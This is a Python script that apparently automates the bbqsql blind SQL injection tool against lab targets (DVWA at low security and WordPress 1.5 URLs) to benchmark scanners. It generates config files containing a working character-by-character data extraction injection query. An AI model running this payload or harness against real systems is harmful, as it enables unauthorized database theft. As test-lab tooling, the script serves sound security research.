#!/usr/bin/env python
from jonathans_scanner import jonathans_scanner

def main():

    name = 'bbqsql'

    scanner = jonathans_scanner(name)

    for url in scanner.dvwa_urls:
        print url
        scanner.setUrls(url)

        #bbqsql takes input from a config file, we'll generate it here
        with open('bbqsql.conf', "w") as configfile:
            print >> configfile, "[Request Config]\n" 
            print >> configfile, "url = " + url + "\n"
            print >> configfile, "method = POST\n"
            print >> configfile, 'cookies = "security=low;PHPSESSID=' + scanner.dvwa_session_id + '"\n'
            print >> configfile, 'proxies = {"http": "127.0.0.1:8080","https": "127.0.0.1:8080"}\n'

            print >> configfile, "\n"
            print >> configfile, "[HTTP Config]\n"
            print >> configfile, 'query = " and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}),${char_index:1},1))${comparator:>}${char_val:0} "\n'
            print >> configfile, "technique = binary_search\n"
            print >> configfile, "comparison_attr = size\n"
            print >> configfile, "concurrency = 30\n"
            print >> configfile, "csv_output_file = "+  scanner.logfile +"\n"

        cmd = ['/usr/bin/bbqsql', '-c', 'bbqsql.conf']
        cmd = ' '.join(cmd)

        test = scanner.begin(cmd)

    for url in scanner.wp15_urls:
        print url
        scanner.setUrls(url)

        #bbqsql takes input from a config file, we'll generate it here
        with open('bbqsql.conf', "w") as configfile:
            print >> configfile, "[Request Config]\n" 
            print >> configfile, "url = " + url + "\n"
            print >> configfile, "method = POST\n"
            print >> configfile, 'cookies = ' + scanner.dvwa_session_id + '\n'
            print >> configfile, 'proxies = {"http": "127.0.0.1:8080","https": "127.0.0.1:8080"}\n'

            print >> configfile, "\n"
            print >> configfile, "[HTTP Config]\n"
            print >> configfile, 'query = " and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}),${char_index:1},1))${comparator:>}${char_val:0} "\n'
            print >> configfile, "technique = binary_search\n"
            print >> configfile, "comparison_attr = size\n"
            print >> configfile, "concurrency = 30\n"
            print >> configfile, "csv_output_file = "+  scanner.logfile +"\n"

        cmd = ['/usr/bin/bbqsql', '-c', 'bbqsql.conf']
        cmd = ' '.join(cmd)

        test = scanner.begin(cmd)

if __name__ == '__main__':
    main()

